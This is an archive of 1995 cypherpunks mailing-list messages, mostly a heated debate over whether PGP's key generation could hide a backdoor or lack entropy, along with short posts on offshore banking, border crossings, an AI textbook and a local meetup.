From: Phil Fraering        <pgf@tyrell.net>
Date: Tue, 1 Aug 95 05:19:20 PDT
To: nzook@bga.com
Subject: OS noise  [Was: a hole in PGP]
In-Reply-To: <Pine.3.89.9507312331.E21268-0100000@jake.bga.com>
Message-ID: <199508011214.AA17761@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Nathan, I know about the Amiga's small OS; I have used them on and
off over the years and recently acquired a non-functional one that
I had repaired; it's at the repair shop in Houston, waiting for the
next time I'm able to go to Houston and pick it up.

I really didn't want to start an OS holy war, although personally my
recent experiences with Windows incline me towards joining the Linux
Inquisition.

Our main weapon is fear, fear and suprise! Our _two_ main weapons are
fear, suprise, and an almost fanatical devotion to the principles of
K & R C. OUR THREE main weapons are...

Hmm. Maybe I should come in again...

+----------------+Quote from _Infinite In All Directions_, F.J. Dyson-----+
| Phil Fraering / \"The English Hierarchy, if there be anything unsound in|
| pgf@tyrell.net\ /its constitution, has reason to tremble even at an air |
+----------------+-pump or an electrical machine."---Joseph Priestly------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Otto <dave@dvorak.jta.edd.ca.gov>
Date: Tue, 1 Aug 95 07:26:19 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: a hole in PGP
In-Reply-To: <9508010008.AA02790@all.net>
Message-ID: <199508011426.HAA01105@dvorak.jta.edd.ca.gov>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 04:54:41 PDT
To: warlord@ATHENA.MIT.EDU (Derek Atkins)
Subject: Re: a hole in PGP?  NOT!
In-Reply-To: <199508010658.CAA18603@charon.MIT.EDU>
Message-ID: <9508011148.AA15766@all.net>
MIME-Version: 1.0
Content-Type: text


Sorry for the long reply.  I hpe this will be taken off-line soon.

...
> Here are some snipets of things you've said.  First, you say that it
> is a rational concern since PGP was taken over by us:
> 
> > The term paranoid is inappropriate in this context.  Paranoia refers to
> > an irrational fear, while I am expressing a rational concern over a
> > system that has been taken over by a (partially) government funded
> > university and which has not been properly verified.  The history of
> > cryptography (as they say) is (quite literally) littered with the dead
> > bodies of people killed because somebody else thought a cryptosystem was
> > good enough when it was not. 

This is a true statement.  Tens of thousands of people have dies because
cryptosystems were trusted when they should not have been (hind sight
being 20/20 of course). 

> Then you talk about the MIT version as if it were the original thing:
> 
> > 	Why (specifically) do you think the MIT version of PGP has no
> > backdoors and is not subject to attacks such as the one outlined in my
> > previous posting?
> 
> PGP 2.0 was released in September, 1992, from Europe, and many many
> people have been examining it ever since.  I truly belive that there
> are no backdoors.

So you believe that there are no backdoors because it was released from
Europe and people have looked at it since.

...
> 
> Anyways, to get back to my claims of your hurtful statements:
> 
> > Why (specifically) do you think so? Because you claim it? Because the
> > MIT maintainer claims it? You say MIT is not associated with the NSA,
> > but they have historically been funded by the NSA and other federal
> > agencies for work on information security.  Do you really think that the
> > only information protected by PGP is dirty pictures? Do you somehow
> > think that MIT and the NSA are above that sort of thing? All you have to
> > do is look at history, and it should be clear that this appeal to
> > authority is often used by those trying to cover things up.  If you know
> 
> I DO NOT GET PAID FOR ANY WORK I DO ON PGP!  I HAVE NEVER RECEIVED A
> DIME FOR MY WORK.  I WORK ON PGP BECAUSE I BELIEVE IN IT.  Having said
> that, I cannot BELIEVE you would have the Balls to say that the NSA
> has bought me.  Go re-read what you've said.  You have just said that
> the MIT PGP team, through MIT, is bound to be covering something up
> because of historical fact.  

I think that you miss the point.  If you worked for the NSA, you would
probably say this as well.  The point is that, for the purposes of
looking at the security of PGP, we should assume that you have evil
intent, whether you do or not.

I didn't say that the NSA bought you.  I asked " Why (specifically)..."
The question mark at the end is a dead give-away.  It is factually
accurate that government agencies have gotten the cooperation of
academics in the past to carry out subversions in order to further their
goals.  I asked "Do you somehow think that MIT and the NSA are above
that sort of thing?"  You apparently do, but history tell us that it is
imprudent to do this.

So if there has been a failure in communications in this respect, I
appologize for not making it as clear as I might have.  If you feel
personally slighted, I am sorry that you feel this way.  Nevertheless, I
believe that it is prudent to believe that the NSA has "bought you" for
the purpose of assessing the security of PGP and to ask the question
"Why (specifically) do you think so?"

> I have never said "Believe me when I said PGP is secure".  I have
> continually asked for you to check on the security yourself.  But you
> have continually refused to do that, and asked why it is secure!  So,
> you refuse to look for yourself, and you refuse to believe it when you
> are told.

I have not refused to do any such thing.  I have had a copy of PGP for
quite some time, but it is too large and complex for me to verify by
hand, and I know of no automated technique that can do the job in any
reasonable amount of time.  I was probably wrong to assume that this was
obvious.

>  So, what the hell do you want?  Do you want a line-by-line
> examination of the code????  Sheesh!

I think it would be prudent to do and publish a line-by-line walkthrough
of the source of PGP (although not to the whole list please).  You
should be trying to prove properties such as the non-interference of any
of the rest of the code with the key generation (or other) algorithms. 
This may be done by an information flow analysis similar to what was
done on our secure W3 server.  It would also be prudent to perform
adequate tests of the properties of inputs from people to determine the
true information content of the seeds and to publish these results so
they can be critiqued.  Perhaps it would also be valuable to have the
members of this list contribute ideas about properties they think would
be worth verifying.

> > It cannot be safely assumed that any program is clean or that any one
> > person or group is not involved with intentionally subverting security.
> > That violates the fundamental principles of information protection.
> 
> You're right, which is why the source code is publically available.  I
> would wholeheartedly agree with you if only binaries are shipped, but
> the source is available.  Anyone can look through and verify the code.
> Anyone can try to find weaknesses.  In fact, everyone is encouraged to
> do so.  I don't see how _this_ "violates the fundamental principles of
> information protection".

The problem is that merely shipping however many lines of source code
does little to demonstrate its propriety.  A publicly posted version of
the source for IRC, for example, had an obvious Trojan horse that wasn't
detected for more than 6 months and was actively being used to attack
systems over the entire period.  In order to assess the source code, it
is necessary to also publish appropriate demonstrations of WHY it is
secure.
 
> > You might be, but even if you are not, that doesn't mean there are no
> > back doors.  Your inability to detect a backdoor gives me little
> > confidence, since this is at least an NP-complete problem and, with all
> > due respect, today, nobody can prove that PGP is free of backdoors
> 
> I think I've finally figured out where you are completely confused!!!
> You are confusing "back door" with "bug".  FYI: A back door is usually
> a means to make it easy for someone to get into a system.  For
> example, if I put in code so that I could read every PGP message by
> typing the passphrase "Setec Astronomy", that would be a backdoor.
> The fact that httpd was exploitable, or sendmail holes, or etc. are
> BUGS, not Back doors.

But don't you see? If I introduce a subtle backdoor and make it look
like a bug, I have plausible deniability.  Since I, as an independent
observer, cannot tell whether the hole is intentional or accidental, I
should, for the purposes of considering security, assume that it is
intentional. 

> Your problem is that you are using these terms interchangably.  THEY
> ARE NOT THE SAME.  Putting in a backdoor has the connotation of
> intent.  A bug is an accidental occurrance that was a side effect of
> poor coding, a typo, carelessness, confusion, inconsistency, etc.  A
> back door, on the other hand, is a DELIBERATE ATTEMPT TO REDUCE OR
> CIRCUMVENT SECURITY!

But how can I, as an independent observer, tell if it is an accident or
a cleaverly intentional subversion? I cannot look into your brain and
tell the difference, and no statement you make can reasonably convince
me.  They may not be the same, but they are not differentiable by an
independent observer.  From a scientific point of view, they are the
same.  From a humanistic point of view they may be different.

> > "...Choosing random quantities to foil a resourceful and motivated
> > adversary is surprisingly difficult.  ...recommends the use of truly
> > random hardware techniques and shows that the existing hardware on many
> > systems can be used for this purpose."
> > 
> > PGP does not use "truly random hardware techniques"
> 
> Oh?  It doesnt?  How can you say that?  In what way does it not do
> this?  The RFC states, in your quote, that "existing hardware on many
> systems can be used" for truly random hardware techniques.  Please,
> substantiate your claim that PGP does not do this.  Show me code
> segments which show it does not.  Show me an analysis that goes
> contrary to the RFC.

You have it backwards.  You show me that the techniques you claim to be
truely random are indeed that.  Supposedly random number generators have
been created for many years, and plenty of them have been broken after
many years of being held to be secure with the algorithm and the full
details available for all to see.

> > But the RFC acknowledges that these methods are highly suspect and should
> > not be trusted.
> 
> You're right, it should not be blindly trusted.  Go read the code and
> examine the algorithms to prove to yourself that it is secure.  I've
> done that to the extent that I wish, and I believe it is secure.  But
> you wont take my word for it, so go ahead and check!  Oh, wait, you
> wont do that either.  Sorry.  I forgot.

But I cannot prove that it is secure.  In fact, I believe that it is not!

> > How is it "unscholarly, unprofessional, needlessly personal, and just
> > plain insulting" to question the idea that hundreds of thousands of
> > people are trusting their freedom to software that is probably not
> > secure? I think it is highly unprofessional to try to claim that PGP is
> > secure and to try to bolster that position by claiming that some
> > "Request for Comments" supports it when that same said RFC refutes it.
> 
> Show me some proof that PGP is "probably not secure"?  Come on, there
> is a finite probability that I can walk through a wall!  The laws of
> quantum probablility give me this finite probability!  But I'd be hard
> pressed to show you that I can walk through the wall.  It looks good
> on paper, but it just ain't gonna happen.

That's exactly what the Germans said about the Enigma and others have
been saying about cryptosystems for the past 4,000+ years.  They have
been shown wrong again and again, and as a result, people like me want
more than just an "I believe it's secure".

> As for the RFC, it does not refute that PGP is secure.  In fact, PGP
> pretty much follows the RFCs guidelines.  You clearly have selective
> reading.  A useful skill -- I should learn it.

It takes years of practice.

> > It has been my general impression that "scholarly" means, among other
> > things, questioning the status quo and finding out where the generally
> > accepted ideas break down.  I am a professional in the field of
> > information protection, and I consider it highly unprofessional in this
> > field to assume that systems are secure without ample evidence to
> > support it.
> 
> Dont forget that you have to run PGP in some OS.  Please show me a
> secure OS!  Given that the OS cannot be secure (using your logic it is
> intuitively obvious that this is true) then how can you ask to see a
> program any more secure than the enviornment in which it runs?  PGP
> tries to be as secure as possible given the environment in which it is
> being run.

I agree that it is often easier to break into the computer to get the
keys than it is to break the cryptosystem.  That was my next bone to
pick with PGP - the way it stores the keys.  But I'll save that for
another day. 

> > So far, I see no ample evidence to support the security of PGP's key
> > generation algorithm relative to the concerns I have expressed.  Those
> > concerns are fairly specific as far as I am concerned, but if you feel I
> > have to demonstrate a specific attack that works in order to question
> > the adequacy of protection, I think you have it backwards.
> 
> No, your concerns have been utterly vague.  The closest you've come to
> being at all specific is some vague notion of analyzing keystrokes.
> In every message I've responded to, I've asked you to expand upon what
> you mean.  What kind of analysis do you mean?  How do you propose to
> analyze keystroke timings?  Even if you have a probabalistic model of
> keystroke timings, all you can possibly do is compare two different
> probabilities to see if they are the same.  But that doesn't help you
> limit the search on keys.

For example, you can generate the most probable 10^40 or so input
sequences, do key generation, and test against them to find out if the
user's key is one of them.  The question I am posing could be considered
as a question of the information content of the original input to PGP's
key generation process.

How could this be subtly altered by a person responsible for maintaining
PGP or detected and not repaired by same? For example, a loop index
could be calculated incorrectly by having a different part of PGP
overwrite the loop index using an incorrect ponter conversion.  Then the
loop that uses all of the input bits would be subtly altered so as to
use fewer of them.  The results would still look random but the total
search space would be reduced to the point where a good supercomputer
could run through it in only a few hours.

> > If the people at MIT feel personally insulted because I have questioned
> > their previously accepted ideas, it's just too bad.  I didn't say they
> 
> I'm not insulted that you are questioning PGP.  I am insulted because
> in every message you have sent, you have postulated some conspiracy
> with the government or postulated some intentional weakening of PGP.

And history tells us that the U.S.  government does this quite often. 
They are actively trying to harass PGP's author using a variety of what
could be reasonably called dirty tricks, they are actively trying to
prevent the use of good cryptography in the US, and they are actively
trying to make certain uses of cryptography illegal.  Why should I
believe that they would not also try to subvert PGP?

> Your statements could almost be construed as libelous, which is why I
> feel insulted.  I feel extremely comfortable with people questioning
> the security of PGP.  What I dont like is someone stating that it is
> not secure, slaiming some sort of back door (which connotes some
> intent to reduce the security) and does not back up the claim with any
> proof.

What I don't like is people that state it is secure but can't back it up
with real facts.  Why (specifically) do you believe PGP is secure?
Forget your ego and the posturing about how you are not working for the
NSA and come up with a really good demonstration of the reason PGP is
secure, and I will be very quick to commend you.

...
> Ok.  Please explain what kind of keystroke timing analysis you
> propose, and I will attempt to answer that, or concede your point.

Fair enough.  A useful first step would be to demonstrate the real
information content of the keystrokes and timings entered by the user
across a reasonable number of different platforms, users, and trials.
That would start to address the potential that there is a fundamental
mistake in (or intentional corruption of) the input process.

The demonstrations described earler would also be worthwhile in
demonstrating the lack of subtle interaction among the parts of PGP (I
refer to the information flow analysis).

After that, you should solicit other ideas from as wide an audience as
possible to see what sorts of properties should be considered for this
sort of program, and go about picking the most important ones first, and
so on.  I would be happy to discuss further details off-line.

> > 	OR come up with another alternative that doesn't ignore my question,
> > 	doesn't avoid the issue, doesn't appeal to authority that fails to
> > 	adequately support your contentions, and doesn't claim that I an
> > 	somehow unprofessional or scholarly for questioning an unproven
> > 	contention.
> 
> Have you heard the thought experiment of putting a back-door in login
> by modifying the C compiler to modilgy the C compiler to modify login?
> Think about that in terms of the security of PGP -- you are always
> going to be limited in security to the security of the system on which
> you are running.

Not a thought experiment, the Turing award paper in 1984 - came out just
a little bit after the IFIP conference in which computer viruses were
first publicly described and analyzed. 

> I only believe you are being unscholarly because you are making claims
> without any supporting evidence.  _THAT_ is unscholarly!

I think there is good supporting historical evidence for my questions.
But I don't believe I have made any "claims".

...

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 05:19:42 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <9508010821.AA20913@cs.umass.edu>
Message-ID: <9508011212.AA17103@all.net>
MIME-Version: 1.0
Content-Type: text


> > PGP does not use "truly random hardware techniques"
> 
> Correct. However, the excerpt of RFC 1750 you quoted above does not claim
> that all PRNG techniques are unreasonably insecure, nor does it suggest that
> they should never be used.

Nor do I.

> > "...For the present, the lack of generally available facilities for
> > generating such unpredictable numbers is an open wound in the design of
> > cryptographic software. ... the only safe strategy so far has been to
> > force the local installation to supply a suitable routine to generate
> > random numbers. To say the least, this is an awkward, error-prone and
> > unpalatable solution." - 1994 - after PGP was implemented.
> 
> I agree with the RFC's authors that mandating provision of platform-
> dependent routines is an awkward and unappealing strategy. Note, however,
> that they characterize it as "the only safe strategy". They say that the
> _strategy_ is error-prone; they do not say that all locally-supplied
> routines are unreasonably insecure, and should not be used.

But in practice, PGP is not used this way by the masses.  They use standard
distributions withou alteration.

...
> > So I guess the RFC supports my contention and not [Derek Atkins'].
> [...]
> [re: PGP's key generation methods]
> > But the RFC acknowledges that these methods are highly suspect and should
> > not be trusted.
> 
> Where ?  Give a citation, please. It doesn't say anything of the sort in
> the part you quoted previously. Furthermore, you inexplicably omitted all
> mentions of keystroke-timing PRNG techniques in RFC 1750. Here are some
> excerpts that strike me as particularly germane to the quality of the
> randomness in PGP:

That is my interpretation, however, reasonable people may differ...

> ------------------------------------------------------------------------
> 4.2 Timing and Content of External Events
> 
>    It is possible to measure the timing and content of mouse movement,
>    key strokes, and similar user events.  This is a reasonable source of
>    unguessable data with some qualifications. On some machines, inputs
>    such as key strokes are buffered.  Even though the user's inter-
>    keystroke timing may have sufficient variation and unpredictability,
>    there might not be an easy way to access that variation.  Another
>    problem is that no standard method exists to sample timing details.
>    This makes it hard to build standard software intended for
>    distribution to a large range of machines based on this technique.
> 
>    The amount of mouse movement or the keys actually hit are usually
>    easier to access than timings but may yield less unpredictability as
>    the user may provide highly repetitive input.
> [...]

Sounds like this is not very random - I agree that "the user may provide
highly repetitive input".  Just because one type of input is more
repetitive, doesn't make the other truely random.

...
> I find it difficult to reconcile your claim that "the RFC acknowledges
> that these methods are highly suspect and should not be trusted" with the
> RFC's assertions that:
> 
> 	"the timing and content of [...] key strokes [...] is a reasonable
> 	 source of unguessable data"

You left out "with some qualifications".  This is the part where I have concern.

> 	"the timing and content of requested `random' user keystrokes can
> 	 yield hundreds of random bits"

You missed the "but conservative assumptions need to be made" part.  Hundreds
of random bits are possible, but how many actual bits of content are contained in
PGP input.

> 	"this strategy may make practical portable code to produce good
> 	 random numbers for security"

You missed the "However, it may still fail against a high grade attack
on small single user systems, especially if the adversary has ever been
able to observe the generation process in the past.  A hardware based
random source is still preferable." part and your reliance on the term
"may" as "does" is overly optimistic.

> Having said that, allow me to state my position on some of the other
> issues you've raised. I do not _know_ nor can I _prove_ that PGP has
> no cryptographic backdoors. I happen to _believe_ that it does not --
> among other things, I have met Derek Atkins and Jeff Schiller, and I
> trust them in this regard. I don't consider that any reason for you to
> believe that it's backdoor-free. In fact, I'm not interested in trying to
> persuade you or anyone else that it is backdoor-free. By the same token,
> I don't see any reason for anyone here to heed your demands that they
> justify _their beliefs_ to _your satisfaction_. 

Not demands - questions.  Why is it that you are unwilling to take
questions as questions and instead translate them into demands? You
could have answered my questions without all the other side comments. 
Why didn't you? I interpret this as being defensive, which means to me
that you are not as sure as you outwardly indicate and that there may be
some lingering issues.  So I ask more questions.  You respond with more
posturing and fewer answers, so I become even more concerned.

It's probably my fault for not asking them in the way you are used to
hearing them, or maybe we are all over-sensitive about our work.

> I remain rather baffled as to your motives in this mini-campaign. You said
> that no-one can prove PGP has no backdoors, and many here essentially said
> "what else is new ?". In the white paper about your small "secure" HTTP daemon,
> thttpd, (found at http://all.net/ManAl/white/whitepaper.html, to save you the
> trouble of more self-promotion ;), it says:
> 
> > Proof of program correctness to verify even simple security
> > properties, for example, grows almost exponentially with the number of 
> > program statements. Verifying a 100 line limited-language program for the
> > simple security properties associated with the Bell-LaPadula model of
> > security takes about 24 hours of CPU time on a Cray supercomputer. The 
> > source code for the NCSA W3 server in widespread use today is about 6600
> > lines long, so there is no computer around today that is likely to be able
> > to verify its security (or more likely demonstrate its insecurity).

Which is why we need very small programs (which PGP is not) that do the
security-critical functions.  We can then analyze these programs and
determine many important properties with regard to their security, which
we cannot do with PGP.

> If we adopt this standard, it seems hopeless to "verify" the PGP source, as
> others have noted here. [BTW, I read your detailed code walkthrough for
> thttp with interest, and commend your work on that. I'm planning some
> sort of similar review for a larger piece of code, and it's encouraging
> to see other people pulling it off.]

Thank you, but I think it may be too hard to do for a much larger piece
of code.  There is another gentleman who is now working on formally (and
automatically) verifying these properties.  Perhaps his results will be of
value in your problem and similar problems for other programs.

...

> [On a largely unrelated note, why does http://all.net/admin/usepolicy.html
> contain the following warning ?  Specifically, why the age limit ?
> 
> 	"This service is ONLY for use by legally competent adults human [sic]
> 	 individuals of age 18 or older. If you do not meet these criteria, 
> 	 you should immediately cease and desist your use of this service."]

I think that some of the popular literature sections may be considered
pornography (Fanny Hill, the Kama Sutra, etc.) and in order to comply
with the applicable laws, I thought it would be prudent to warn off our
fragile youth.

> "...because of Dr. Cohen's frequent, blatant, and intentional disregard for
>  the guidelines that this list operates under, and because of his apparent
>  disregard for the frequently expressed opinions of many of the members of
>  this list that they don't appreciate his antics, I've configured Majordomo 
>  to divert all messages he posts to Firewalls to the list owner for review 
>  and approval before posting..." -Brent Chapman, July 24, 1995

And if enough of those on this list feel that this discussion and my postings
are too commercial or too abusive to take, I am certain that Brent will send
you a free copy of his Fred filter.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 1 Aug 95 06:59:24 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <199508011359.IAA20397@edison.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>How is it "unscholarly, unprofessional, needlessly personal, and just
>plain insulting" to question the idea that hundreds of thousands of
>people are trusting their freedom to software that is probably not
>secure? I think it is highly unprofessional to try to claim that PGP is
>secure and to try to bolster that position by claiming that some
>"Request for Comments" supports it when that same said RFC refutes it.
...
...
>As far as the potential that they are working with the NSA to subvert
>personal privacy, it is a potential, just as it is a potential that I am
>working with the NSA to undermine confidence in PGP.  The issue is and
>should be, why (specifically) do you believe that PGP is secure.

Here you go again. "Probably not secure". Earlier you make implications
of trap doors.  The only way for a trap door to be there, would be if
one of the authors put it there. Otherwise, you would be suggesting
that one dark night, on a new moon, the NSA snuck in to MIT, changed
the source code, inserted a back door, and snuck out without anybody
being the wiser.  Implying there is a trap door is much different than
implying there may be a flaw in the code itself that allows a security
breach.

I agree with Matt's assessment on your behavior Fred. Your statements
lead me (among others) to believe that you think that one or more
of the authors are not trustworthy and have tampered with the code
to insert trap doors. His remarks on your statements being near-defamatory
hit mighty close to home for this on-looker. I'm sure I'm not alone.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 1 Aug 95 10:16:14 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Currency risk on bank accounts
In-Reply-To: <199508010621.XAA28791@ix6.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950801094410.11495B-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 31 Jul 1995, Bill Stewart wrote:
> Some of the Channel Island banks offer accounts with ATM cards;
> I think some of them are in Jersey (you don't have to remind people
> you didn't say _New_ Jersey :-)

Banks most any place in the world can do the same.  You can get
ATM cards from banks in Europe and Asia and probably Africa and
Latin America that use the PLUS or Cirrus(sp?) system.  You can
open an account by mail at most of them.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@alias.com>
Date: Tue, 1 Aug 95 07:04:20 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Stopped at the boarder
In-Reply-To: <9508010351.AA18289@all.net>
Message-ID: <9508011001.ZM17072@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 31, 11:51pm, Dr. Frederick B. Cohen wrote of his experiences at
the Canada-USA border:
>  They looked at every slide, checked out
> the bags themselves for secret compartments, but the one thing they
> didn't do was check the contrnts of my floppy disks.  Istn't technology
> wonderful?

Until a few years ago, carrying software across the border from the states
to Canada, one would only pay duty on the value of the media. Canadian
Customs regulations did not recognise any value in the information
contained on the floppies. I haven't actively exported/imported software
in this manner recently (well, I carried 2.6ui to Mobile and back without
realising it (or, indeed, ever putting it in a drive) and so broke ITAR)
so I'm not sure how things stand currently.

I think they might actually have been convinced of the value of software.
[Department of External Affairs and International Trade has been, as noted
earlier. Danger of software, at least.]

frodo =)

-- 
Richard Martin 
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@alias.com/g4frodo@cdf.toronto.edu       http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 1 Aug 95 09:59:52 PDT
To: cypherpunks@toad.com
Subject: BOOK: "Artificial Intelligence: A Modern Approach"
Message-ID: <ac43aa670b021004432b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



On a lighter note, I've recently gotten a new book, "Artificial
Intelligence: A Modern Approach," by Stuart Russell and Peter Norvig, 1995,
Prentice-Hall, ISBN 0-13-103805-2.

In 900 pages of well laid-out text, with excellent use of typography to
make finding topics easy, it seems to be a great compendium of methods
loosely called "AI."

AI has gotten a bad rap, perhaps deservedly after the hype of the mid-80s,
but the methods are useful for various purposes.

This book is focussed on "agents," and lots of code fragments are available
(in Common Lisp) for actual construction of agents. Topics that relate to
Cypherpunks are scattered throughout the text, including stuff on planning,
provably correct designs, game theory, simulations, neural nets, belief,
and ontology. Lots more stuff, too. (If I were writing a formal book
review, I'd say more. But this is just a pointer, so that interested folks
can check it out at their local technical bookstore or university library.)

Not a lot to do with getting PGP 3.0 out the door, and not a lot to do with
building remailers, but stuff I find interesting.

Let a thousand flowers bloom.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Tue, 1 Aug 95 02:17:47 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <9508010120.AA07073@all.net>
Message-ID: <Pine.SOL.3.91.950801100122.1688D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote:

> A reasonable response.  My question is: Why do you think that the key
> generation algorithm used by PGP is secure? Specifically, how do we know
> there is no subtle back door that reduces the problem of testing the
> typical key space to a solvable problem in today's technology?

Well I told you that I verified the results of the key generation in PGP 
by testing the primality of p and q and the validity of the key by 
testing ed = 1 mod (p-1)(q-1).  That bit works, period.

You seem to be in some doubt about the random starting point for the prime
searching.  Entropy for the random number generator is collected from the
user's keystrokes and is mixed into the random pool.  PGP is very careful
about how much entropy it attaches to one keystroke and makes sure that
the user is prompted to press more keys if it thinks it has not got
enough.  The random pool is itself stirred periodically by using MD5 to
"encrypt" it.  This encryption is made strictly one way by using the first
64 bytes of the pool as the key, these 64 bytes are destroyed after use. 

Now, amongst other times the pool is stirred both before and after use.  
So, recovering any given state of the pool (i.e. finding the random 
starting point for a prime search) has to be equivalent to reversing the 
MD5 transform.  There is no known way to do this.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Tue, 1 Aug 95 02:32:52 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <9508010120.AA07073@all.net>
Message-ID: <199508010932.KAA11464@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>A reasonable response.  My question is: Why do you think that the key
>generation algorithm used by PGP is secure? Specifically, how do we know
>there is no subtle back door that reduces the problem of testing the
>typical key space to a solvable problem in today's technology?
>
>I don't believe I made ANY "vague, wild, unsupported claims" however,
>that is certainly a matter of opinion.
>
	OK, let me put my 2 pence collaboration:

	Let's see. I can try to write a nice program to protect myself.
I could XOR something with my key (00000000) and use that. Then tell my
fellows and all of us use the same program.

	Or I could even be more tricky and implement something more complex.

	Now, my knowledge, time and resources are limited. I see that MIT
or whomever has made a program that, under test, is more secure than my
XOR 00000000 implementation. I may not fully trust them but it is better
than anything I could come out with.

	So, my position is: if it's the best thing I have access to, I only
have two options: either I use it or I give up with cryptography at all.
Right?

	Now, I think that what I am trying to say is: if you can come up
with something better, please do. All the Free (and Wannabe Free) World
will be eternally grateful to you. If you can't, then you only have the
above two options.

	Bragging about hypothetical fears that you can't demonstrate at all
is not only stupid, it is also pesimistic, destructive, improductive and
threatening all kinds of freedom. Nazi perhaps? Dunno. And I don't care.

	Security? As you have already been told, you can only prove it
negatively. So, since you can only prove that it can fail, but can't prove
it can't, any discussion is irrelevant unless you have any real proof.

	All the process is based in a fight against time: you are assuming
that nobody can break your crypto process before the secret becomes irrelevant.
All your security lies in the fact that *YOU* don't know of anybody that 
can break the problem but can't deny that  someone could ever possibly 
discover a clever algorithm.

	Thus: either you have proofs that it can be broken, or know a better
algorithm, or can name someone who can proof s/he can break it, or you just
trust it the best you can. Any other kind of discussion is a sophism.

	Dr?... hum. Let me try then a different analogy: I do have a patient
with a letal disease with no known therapy. Then someone comes up with A,
which cures people, but -being new- could maybe possibly perhaps have some
secondary effect that no one knows yet and can't be demonstrated (but could
exist). Now, should I trust the lifes of my patients to therapy A or should
I wait for some years to be secure it has no secondary effects?. Even so,
since the fact nobody has reported them doesn't mean it could not have
them (only that nobody has discovered them), I can't be 100% sure.

	Oh, well, I guess that if your doctor never gave you a therapy 'cos
you can never be 100% sure, you would not like the idea. Would you trust
your life to that therapy when you know for sure you are about to die if
you don't? What if A saved 100%, but there was a therapy B that saved 20%
with no known secondary effects either? Which one would you chose?

	Thus, can you trust lives and whatnot to something not fully known?
I'd say that unless you have something better, that's your better bet. So,
since you know for sure that if you don't use any cryptography at all, you
must communicate in the clear, what do you do?

	So, can you come up with something better or not?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 1 Aug 95 11:12:32 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Santa Cruz (CSC)
Message-ID: <ac43bbbe120210045621@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



About a month ago I sent out a notice suggesting that we in the greater
Santa Cruz area (Monterey, Carmel, Watsonville, Soquel, Boulder Creek, even
parts of Santa Clara Valley, etc.) have a get-together occasionally, as the
Bay Area meetings are quite far away (and possibly getting further away if
they continue meeting in San Francisco).

Response was better than I'd expected, with 17 people sending me notes
asking to be kept informed of the thing.

I just sent out a notice to them, partly to make sure my mail addresses are
accurate and well-formed, and partly to update them on the meeting time
(which will be Saturday, August 26th, the last Saturday of the month, at my
house in Corralitos, CA).

If you got my "CSC MEETING..." message, then you need do nothing further.
If you did not get it, and wish to, send me a message.

If you know of others in the area who may be interested, forward them this
message.

This mailing list is maintained manually, in Eudora Pro, so send me English
messages, or the best approximation of English you can manage.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
